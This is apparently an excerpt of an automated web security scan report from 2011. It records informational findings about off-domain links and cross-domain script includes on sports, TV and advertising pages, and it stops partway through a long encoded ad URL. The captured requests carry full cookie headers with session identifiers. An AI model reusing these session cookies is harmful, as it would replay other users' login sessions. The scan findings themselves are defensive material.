<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.hiphopbeefs.info/" target="_blank"> http://www.hiphopbeefs.info/</a>
...[SNIP]...

18.229. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=game+of+thrones&date=2011-6-13&sa=X

The response contains the following links to other domains:

http://kotaku.com/
http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
http://moviesblog.mtv.com/
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
http://www.tvfanatic.com/
http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/

Request

GET /trends/hottrends?q=game+of+thrones&date=2011-6-13&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=dallas+mavericks&date=2011-6-13&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:17:42 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
Content-Length: 11434
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: game of thrones, Jun 13,
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.tvfanatic.com/" target="_blank"> http://www.tvfanatic.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/" target="_blank">
'<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://moviesblog.mtv.com/" target="_blank"> http://moviesblog.mtv.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean" target="_blank">
A <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://kotaku.com/" target="_blank"> http://kotaku.com/</a>
...[SNIP]...

18.230. http://www.nba.com/video/cvp/teamarticleplayer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/video/cvp/teamarticleplayer.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.nba.com/video/cvp/teamarticleplayer.html?videoID=/video/channels/playoffs/2011/06/12/20110612_trophy_presentation.nba&width=300&height=170

The response contains the following links to other domains:

http://i.cdn.turner.com/xslo/cvp/js/cvp/cvp_1.6.1.min.js
http://z.cdn.turner.com/nba/nba/.element/js/1.1/lib/prototype-1.6.0.3.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/cvp/article_nbaVideoPlayer.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/nbaTeams.js
http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/nbaOmEvent.js
http://z.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js

Request

GET /video/cvp/teamarticleplayer.html?videoID=/video/channels/playoffs/2011/06/12/20110612_trophy_presentation.nba&width=300&height=170 HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_vi=[CS]v1|26FAF7070501327A-60000100E0022607[CE]; s_sq=%5B%5BB%5D%5D; JSESSIONID=78DF53F9F3A295B19B98E52724C9D0C9; rsi_segs_ttn=A09801_10102|A09801_10001

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=132
Date: Mon, 13 Jun 2011 11:20:27 GMT
Content-Length: 2351
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>NBA.com: Embeddable Video Player</title>
       <style>
           body { margin: 0px; font-family: Arial, Helvetica, sans-se
...[SNIP]...
</script>
       <script type="text/javascript" src="http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/omniture/nbaOmEvent.js"></script>
...[SNIP]...
<br clear="all"/>

       <script type="text/javascript" src="http://z.cdn.turner.com/nba/nba/.element/js/1.1/lib/prototype-1.6.0.3.js"></script>
   <script type="text/javascript" src="http://i.cdn.turner.com/xslo/cvp/js/cvp/cvp_1.6.1.min.js"></script>
       <script type="text/javascript" src="http://z.cdn.turner.com/nba/nba/.element/js/2.0/global/nbaTeams.js"></script>
       <script type="text/javascript" src="http://z.cdn.turner.com/nba/nba/.element/js/2.0/cvp/article_nbaVideoPlayer.js"></script>
       <script src="http://z.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

18.231. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.paperg.com/jsfb/embed.php?pid=16509&bid=3958

The response contains the following link to another domain:

http://www.thesouthern.com/app/flyerboard/flyerboard.php?pid=16509&bid=3958&cid=0

Request

GET /jsfb/embed.php?pid=16509&bid=3958 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=1.1305557272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027440590.1305557272.1305557272.1305557272.1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 46774
Connection: Keep-alive
Via: 1.1 AN-0016020122637050

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL3958 = 'http://www.
...[SNIP]...
<div class="options-fb-wrap"><a href="http://www.thesouthern.com/app/flyerboard/flyerboard.php?pid=16509&bid=3958&cid=0" title="View All" target="_blank"><span>
...[SNIP]...

18.232. http://www.stumbleupon.com/badge/embed/5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/badge/embed/5/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stumbleupon.com/badge/embed/5/?url=http%3A%2F%2Fwww.ugo.com%2Ftv%2Fgame-of-thrones-baelor-preview

The response contains the following links to other domains:

http://cdn.stumble-upon.com/css/badges_su.css?v=20110609
http://cdn.stumble-upon.com/js/badge_su.js?v=20110609

Request

GET /badge/embed/5/?url=http%3A%2F%2Fwww.ugo.com%2Ftv%2Fgame-of-thrones-baelor-preview HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=6665060744dec01385c2c88.28433254; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1145
Date: Mon, 13 Jun 2011 11:23:16 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>


           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110609" type="text/css" media="screen, projection" />

                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110609"></script>
...[SNIP]...

18.233. http://www.ugo.com/cm/ugo/js/ugo-global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ugo.com
Path:	/cm/ugo/js/ugo-global.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.ugo.com/cm/ugo/js/ugo-global.js?nocache312011

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/ugo.ugo.games/games-index;dev=true;pt=free-games;channel=games;;sz=300x250;pos=top;tile=3;ord=1

Request

GET /cm/ugo/js/ugo-global.js?nocache312011 HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=CEADD88E-95AE-11E0-BF5A-4CC41DBFF5A0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:49 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 19:34:22 GMT
ETag: "13d5d-4e88-4a3f68eecab80"
Accept-Ranges: bytes
Content-Length: 20104
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: application/x-javascript

/* Global UGO Scripts */
$j(document).ready(function() {

   // awesome custom selector
   $j.expr[':'].parents = function(node,i,m) {
       return $j(node).parents( m[3] ).length < 1;
   };

// s
...[SNIP]...
' );
   var old_dw = document.write;
   var old_dwl = document.writeln;

   document.write = ugo_make_writer( '#top-300x250' );
   document.writeln = ugo_make_writer( '#top-300x250' );

   var stag = '<script type="text/javascript" src="http://ad.doubleclick.net/adj/ugo.ugo.games/games-index;dev=true;pt=free-games;channel=games;;sz=300x250;pos=top;tile=3;ord=1">';

   $j( '#top-300x250' ).html( stag );

   */
}

18.234. http://www2.glam.com/app/site/affiliate/viewChannelModule.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The page was loaded from a URL containing a query string:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250

The response contains the following link to another domain:

http://pixel.quantserve.com/seg/r;a=p-874AVp33Bbtkg;rand=70892130796292249099;*http://www22.glam.com/cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=qcsegs&gvalue=!qcsegs

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 13 Jun 2011 11:02:02 GMT
Content-Length: 60018
Connection: close

// 
// 

window.glam_session = new Object();
window.glam_session.countr
...[SNIP]...
lam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

window.glam_session.user_agent_type='2';

document.write('<img style="display:none;" src="http://pixel.quantserve.com/seg/r;a=p-874AVp33Bbtkg;rand=70892130796292249099;*http://www22.glam.com/cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=qcsegs&gvalue=!qcsegs" height="0" width="0" border="0">');

function GlamProcessScriptParams()
{

}

window.glam_affiliate_id = '1000212071';
window.glam_zone = '';
window.glam_ad_size = '300x250';
window.glam_status = '';
window.glam_status = (w
...[SNIP]...

19. Cross-domain script include previous next
There are 97 instances of this issue:

http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/x1.dt/dt2
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
http://ad.doubleclick.net/adj/fansided.fsv/ros
http://adopt.imiclk.com/emb/q
http://adopt.imiclk.com/emb/q
http://bidnw.ru4.com/nf
http://bidnw.ru4.com/nf
http://bn.xp1.ru4.com/nf
http://cdn.triggertag.gorillanation.com/js/triggertag.js
http://fansided.com/category/nba/
http://fls.doubleclick.net/activityi
http://g-ecx.images-amazon.com/images/G/01/pda/pda.js
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://ib.adnxs.com/ab
http://idolator.com/ifb/audience-science.html
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php
http://kotaku.com/static/ad_iframe.php
http://kotaku.com/static/ad_iframe.php
http://kotaku.com/static/items/kotaku.com/trackers.html
https://login.yahoo.com/config/login_verify2
http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2
http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
http://sportdfw.com/aboutcontact-us/
http://sportdfw.com/img/city/dallas/img/content-email-submit.gif
http://sportdfw.com/z-the-fort-worth-four/
http://sports.yahoo.com/nba/expertsarchive
http://sports.yahoo.com/nba/news
http://sports.yahoo.com/nba/news
http://sports.yahoo.com/nba/news
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/like.php
http://www.gamershell.com/news_118846.html
http://www.imdb.com/images/a/ifb/google_afc_labs.html
http://www.imdb.com/images/a/ifb/pda_comm2.html
http://www.imdb.com/title/tt0944947/
http://www.imdb.com/title/tt0944947/_ajax/footer
http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
http://www.mavsmoneyball.com/fanposts
http://www.mavsmoneyball.com/mavericks-tickets
http://www.mavsmoneyball.com/mavericks-tickets
http://www.mavsmoneyball.com/mavericks-tickets
http://www.nba.com/mavericks/index_main.html
http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html
http://www.nba.com/video/cvp/teamarticleplayer.html
http://www.stumbleupon.com/badge/embed/5/
http://www.twackle.com/
http://www.twackle.com/fansided/General_Twackle_Widget
http://www.twackle.com/headlines
http://www.ugo.com/cm/ugo/js/ugo-global.js
http://www.ugo.com/xd_receiver.htm
http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N553.expedia.com/B5280302.8;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?

Request

Response

19.2. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKgC7SkJAurVkIG6ypvqgo9ZQkHdnZW8sdXNhLHQsMTMwNzk2OTUzODM0NixjLDM0NTc3MCxwYyw3NzQ4MixhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVoSlIxUTljZjJQbjdaRVFMRXlfaVJwcTdGRnBuWlc4c2RYTmhMSFFzTVRNd056azJPVFV6TmpNMk55eGpMRE0wTmpRMk9DeHdZeXczT1Rjd01TeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNCSVFUbERkR1ZxUld0RGEyTkVNRXN4TmsxVFVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1V4c01EaHZVVWRJV25OZllYbEVSMjkyUW1SNVh6bENYMXBPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU2psQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVGUk1FSkJaMVZEUVZGUlFVRkJRVUV4UWpoa1RXZEJRVUZCUVM0dlkyNWtQU0ZqUVZoVlRGRnFZek5uVVZGNVpXZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkhjRUZxWDBGbU1sUmtOemhQZFZCTWMxRmxXblZOUTBORVRtWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTjBRMVJCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFWQlVTMlZuUkhSUmFtOUJlRlF4UVhkQlFVRk5RMEZDZEVkNGJWcHhTMnMwTTJ0UlVTWnVkVzA5TVNaemFXYzlRVWRwVjNGMGQwaHlhRlUwTkVzd0xWUndZakEzV0dwMFEzWkdTbUZzVm5oS2R5WmpiR2xsYm5ROVkyRXRjSFZpTFRjME9UUXhOVFl3TWpjd01UZ3pOREltWVdSMWNtdzlDZy0tL2Nsa3VybD0K/clkurl=;ord=541949523?

Request

Response

19.3. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUPHluEI0CFhQMntGSMIANeF9ITIFnZW8sdXNhLHQsMTMwNzk2NDAxMjUyMyxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU0T3BXZDUxNy56WUJWN21Gbmx3ZjFDdTVBXzFuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RBeE9TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUkVSMFgzVlRZekJrYkVGZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZabk9FSkJaMVZEUVZGUlFVRkJRVUZOVW5seFEyZEJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkpUVTg0V2xCTU1WUmlOMlpCTm1KUmJGRmxUelZsUnpSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ